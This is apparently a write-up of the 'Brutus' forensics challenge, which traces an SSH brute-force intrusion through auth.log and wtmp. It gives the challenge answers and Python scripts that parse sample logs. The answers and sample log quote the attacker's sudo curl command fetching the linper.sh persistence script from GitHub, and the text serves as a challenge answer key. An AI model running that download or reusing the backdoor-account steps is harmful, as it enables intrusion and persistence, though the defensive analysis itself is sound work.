Introduction to the Brutus Challenge
I want to share some tips for approaching the Brutus challenge.
Sherlock Scenario on Brutus
In this very easy Sherlock, you will familiarize yourself with Unix auth.log and wtmp logs. We'll explore a scenario where a Confluence server was brute-forced via its SSH service. After gaining access to the server, the attacker performed additional activities, which we can track using auth.log. Although auth.log is primarily used for brute-force analysis, we will delve into the full potential of this artifact in our investigation, including aspects of privilege escalation, persistence, and even some visibility into command execution.
Brutus is an entry-level DFIR challenge with two artifacts: auth.log and wtmp. The goal is to trace an SSH brute-force attack where the attacker cracks the root password.
The attacker then reconnects, creates a new user, adds it to the sudo group, and uses it to execute commands with elevated privileges.
Tools used in this Brutus Sherlock challenge
- utmpdump is a command-line tool for Unix-like systems that lets you view the login and logout records stored in binary files such as /var/run/utmp (current logins) and /var/log/wtmp (historical logins). It converts the binary data in these files into a human-readable format, making it easy to see who is logged in, when, and from where. With simple commands like utmpdump /var/run/utmp for current logins or utmpdump -r /var/log/wtmp for historical records, you can audit user activity, troubleshoot issues, or investigate security incidents. It is a must-have tool for system administrators and security professionals!
- A text editor, used to read auth.log, which contains useful information such as timestamps.
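To show what the utmpdump text looks like and how a wtmp dump is turned into login sessions with durations, here is an added Python example (my own code, not part of the original writeup or the challenge files). The dump below is constructed for illustration: the IP, user names and times follow the answers in this writeup, while the PIDs, tty lines and the boot record are placeholders. The field layout is the one utmpdump prints: [type] [pid] [id] [user] [line] [host] [addr] [time], where type 7 is USER_PROCESS (login), 8 is DEAD_PROCESS (logout) and 2 is BOOT_TIME.

```python
import re
from datetime import datetime

USER_PROCESS = 7   # a login on a tty/pts line
DEAD_PROCESS = 8   # that line was closed (logout)
BOOT_TIME = 2

# Constructed utmpdump output (placeholder PIDs, tty lines and kernel string).
SAMPLE_UTMPDUMP = """\
[2] [00000] [~~  ] [reboot  ] [~           ] [kernel              ] [0.0.0.0        ] [2024-03-06T06:17:15,000000+00:00]
[7] [02491] [ts/1] [root    ] [pts/1       ] [65.2.161.68         ] [65.2.161.68    ] [2024-03-06T06:32:45,000000+00:00]
[8] [02491] [    ] [        ] [pts/1       ] [                    ] [0.0.0.0        ] [2024-03-06T06:37:24,000000+00:00]
[7] [02667] [ts/1] [cyberjunkie] [pts/1       ] [65.2.161.68         ] [65.2.161.68    ] [2024-03-06T06:37:34,000000+00:00]
"""

FIELD_RE = re.compile(r"\[([^\]]*)\]")


def parse_utmpdump(text):
    """Parse utmpdump text output into a list of record dicts."""
    records = []
    for line in text.splitlines():
        fields = [f.strip() for f in FIELD_RE.findall(line)]
        if len(fields) != 8:
            continue  # blank or malformed line
        rtype, pid, ident, user, tty, host, addr, stamp = fields
        # utmpdump writes the fractional seconds after a comma; strptime wants a dot
        when = datetime.strptime(stamp.replace(",", "."), "%Y-%m-%dT%H:%M:%S.%f%z")
        records.append({"type": int(rtype), "pid": int(pid), "id": ident, "user": user,
                        "line": tty, "host": host, "addr": addr, "time": when})
    return records


def login_sessions(records):
    """Pair each USER_PROCESS record with the next DEAD_PROCESS on the same tty line.

    Returns one dict per session; 'seconds' is None for logins that never closed
    (still active when the file was collected, or the host went down).
    """
    open_logins = {}
    sessions = []
    for rec in records:
        if rec["type"] == USER_PROCESS:
            open_logins[rec["line"]] = rec
        elif rec["type"] == DEAD_PROCESS and rec["line"] in open_logins:
            start = open_logins.pop(rec["line"])
            sessions.append({"user": start["user"], "host": start["host"], "line": rec["line"],
                             "login": start["time"], "logout": rec["time"],
                             "seconds": int((rec["time"] - start["time"]).total_seconds())})
    for start in open_logins.values():
        sessions.append({"user": start["user"], "host": start["host"], "line": start["line"],
                         "login": start["time"], "logout": None, "seconds": None})
    return sessions


def logins_from(records, addr):
    """All USER_PROCESS records whose source address matches addr."""
    return [r for r in records if r["type"] == USER_PROCESS and r["addr"] == addr]


if __name__ == "__main__":
    recs = parse_utmpdump(SAMPLE_UTMPDUMP)
    for s in login_sessions(recs):
        print(f"{s['user']:<12} from {s['host']:<16} {s['login']:%H:%M:%S} -> "
              f"{s['logout']:%H:%M:%S} ({s['seconds']}s)" if s["logout"]
              else f"{s['user']:<12} from {s['host']:<16} {s['login']:%H:%M:%S} -> still open")
```

One caveat on the flag mentioned above: in util-linux, utmpdump -r (--reverse) converts a text dump back into the binary utmp/wtmp format; the text this parser reads is produced by the plain utmpdump /var/log/wtmp. Matching on the tty line rather than the PID is deliberate: the DEAD_PROCESS record carries the line and an empty user field, so the line is the reliable join key.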

The screenshot above shows the content of the auth.log file

Questions and Answers
Analyzing the auth.log, can you identify the IP address used by the attacker to carry out a brute force attack?

Answer: 65.2.161.68
The brute force attempts were successful, and the attacker gained access to an account on the server. What is the username of this account?

Answer: root
Can you identify the timestamp when the attacker manually logged in to the server to carry out their objectives?

Answer: 2024-03-06 06:32:45
SSH login sessions are tracked and assigned a session number upon login. What is the session number assigned to the attacker’s session for the user account from Question 2?

Answer: 37
The attacker added a new user as part of their persistence strategy on the server and gave this new user account higher privileges. What is the name of this account?

Answer: cyberjunkie
What is the MITRE ATT&CK sub-technique ID used for persistence?

Source: MITRE ATT&CK Matrix
Answer: T1136.001
How long did the attacker's first SSH session last, based on the previously confirmed authentication time and the session ending within the auth.log? (seconds)
The session ran from 06:32:45 to 06:37:24, a duration of 279 seconds.
Answer: 279
The attacker logged into their backdoor account and utilized their higher privileges to download a script. What is the full command executed using sudo?

Answer: /usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh
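The answers above are all extracted from auth.log by hand. The following Python script, an added example of my own rather than code from the original writeup, does the same work programmatically over a constructed auth.log excerpt: it counts failed password attempts per source IP (the brute-force source), lists accepted logins, pairs systemd-logind "New session N" and "Removed session N" messages to get session numbers and durations, and pulls out useradd, group-membership and sudo events. The excerpt is not the challenge's real file: the hostname, PIDs, ports and the extra session 34 are placeholders, while the IP, users, timestamps and the sudo command follow the answers in this writeup. The line formats are the standard ones written by sshd, pam_unix, systemd-logind, useradd, usermod and sudo.

```python
import re
from collections import Counter
from datetime import datetime

# Constructed auth.log excerpt (placeholder hostname, PIDs and ports).
SAMPLE_AUTH_LOG = """\
Mar  6 06:31:31 host sshd[2325]: Failed password for invalid user admin from 65.2.161.68 port 46380 ssh2
Mar  6 06:31:31 host sshd[2327]: Failed password for root from 65.2.161.68 port 46392 ssh2
Mar  6 06:31:32 host sshd[2329]: Failed password for invalid user backup from 65.2.161.68 port 46400 ssh2
Mar  6 06:31:32 host sshd[2331]: Failed password for root from 65.2.161.68 port 46412 ssh2
Mar  6 06:31:33 host sshd[2333]: Failed password for root from 65.2.161.68 port 46424 ssh2
Mar  6 06:31:35 host sshd[2335]: Failed password for root from 203.0.113.5 port 51022 ssh2
Mar  6 06:31:40 host sshd[2411]: Accepted password for root from 65.2.161.68 port 34782 ssh2
Mar  6 06:31:40 host systemd-logind[411]: New session 34 of user root.
Mar  6 06:31:41 host systemd-logind[411]: Removed session 34.
Mar  6 06:32:45 host sshd[2491]: Accepted password for root from 65.2.161.68 port 53184 ssh2
Mar  6 06:32:45 host sshd[2491]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)
Mar  6 06:32:45 host systemd-logind[411]: New session 37 of user root.
Mar  6 06:34:18 host useradd[2592]: new user: name=cyberjunkie, UID=1002, GID=1002, home=/home/cyberjunkie, shell=/bin/bash, from=/dev/pts/1
Mar  6 06:35:15 host usermod[2628]: add 'cyberjunkie' to group 'sudo'
Mar  6 06:37:24 host sshd[2491]: pam_unix(sshd:session): session closed for user root
Mar  6 06:37:24 host systemd-logind[411]: Removed session 37.
Mar  6 06:39:38 host sudo: cyberjunkie : TTY=pts/1 ; PWD=/home/cyberjunkie ; USER=root ; COMMAND=/usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh
"""

# syslog line: "<Mon dd HH:MM:SS> <host> <program>[<pid>]: <message>" (pid is optional)
LINE_RE = re.compile(r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) "
                     r"(?P<prog>[^\[:]+)(?:\[(?P<pid>\d+)\])?: (?P<msg>.*)$")
FAILED_RE = re.compile(r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port")
ACCEPTED_RE = re.compile(r"Accepted \S+ for (?P<user>\S+) from (?P<ip>\S+) port")
NEW_SESSION_RE = re.compile(r"New session (?P<id>\d+) of user (?P<user>\S+)\.")
REMOVED_SESSION_RE = re.compile(r"Removed session (?P<id>\d+)\.")
USERADD_RE = re.compile(r"new user: name=(?P<user>[^,]+),")
GROUP_RE = re.compile(r"add '(?P<user>[^']+)' to group '(?P<group>[^']+)'")
SUDO_RE = re.compile(r"^(?P<user>\S+) : .*?COMMAND=(?P<cmd>.*)$")


def parse_auth_log(text, year=2024):
    """Parse syslog-style auth.log lines; the year is not in the log, so it is supplied."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {' '.join(m['ts'].split())}", "%Y %b %d %H:%M:%S")
        events.append({"time": ts, "prog": m["prog"], "msg": m["msg"]})
    return events


def failed_password_sources(events):
    """Failed SSH password attempts per source IP; the top entry is the brute-force source."""
    counts = Counter()
    for e in events:
        m = FAILED_RE.search(e["msg"])
        if e["prog"] == "sshd" and m:
            counts[m["ip"]] += 1
    return counts


def accepted_logins(events):
    """(time, user, ip) for every successful SSH authentication."""
    out = []
    for e in events:
        m = ACCEPTED_RE.search(e["msg"])
        if e["prog"] == "sshd" and m:
            out.append((e["time"], m["user"], m["ip"]))
    return out


def logind_sessions(events):
    """{session id: {user, start, end, seconds}} from systemd-logind messages."""
    sessions = {}
    for e in events:
        if e["prog"] != "systemd-logind":
            continue
        if m := NEW_SESSION_RE.search(e["msg"]):
            sessions[int(m["id"])] = {"user": m["user"], "start": e["time"], "end": None, "seconds": None}
        elif (m := REMOVED_SESSION_RE.search(e["msg"])) and int(m["id"]) in sessions:
            s = sessions[int(m["id"])]
            s["end"] = e["time"]
            s["seconds"] = int((s["end"] - s["start"]).total_seconds())
    return sessions


def interactive_sessions(sessions, min_seconds=5):
    """Session ids that stayed open long enough to be a human, not a tool validating a password."""
    return sorted(i for i, s in sessions.items() if s["seconds"] is None or s["seconds"] >= min_seconds)


def new_users(events):
    return [m["user"] for e in events if e["prog"] == "useradd" and (m := USERADD_RE.search(e["msg"]))]


def group_additions(events):
    return [(m["user"], m["group"]) for e in events if e["prog"] == "usermod" and (m := GROUP_RE.search(e["msg"]))]


def sudo_commands(events):
    return [(m["user"], m["cmd"]) for e in events if e["prog"] == "sudo" and (m := SUDO_RE.match(e["msg"]))]


if __name__ == "__main__":
    ev = parse_auth_log(SAMPLE_AUTH_LOG)
    print("failed attempts by IP:", failed_password_sources(ev).most_common())
    for t, u, ip in accepted_logins(ev):
        print(f"accepted {u} from {ip} at {t:%Y-%m-%d %H:%M:%S}")
    for sid, s in logind_sessions(ev).items():
        print(f"session {sid} user={s['user']} seconds={s['seconds']}")
    print("new users:", new_users(ev), "group adds:", group_additions(ev))
    print("sudo:", sudo_commands(ev))
```

The session pairing is what separates the brute-force tool's hit from the manual login: in the constructed excerpt the first accepted password opens a session that is removed one second later (the tool only validated the credential), while session 37 stays open for 279 seconds and contains the useradd and usermod activity, which is why the manual-login timestamp is the later one.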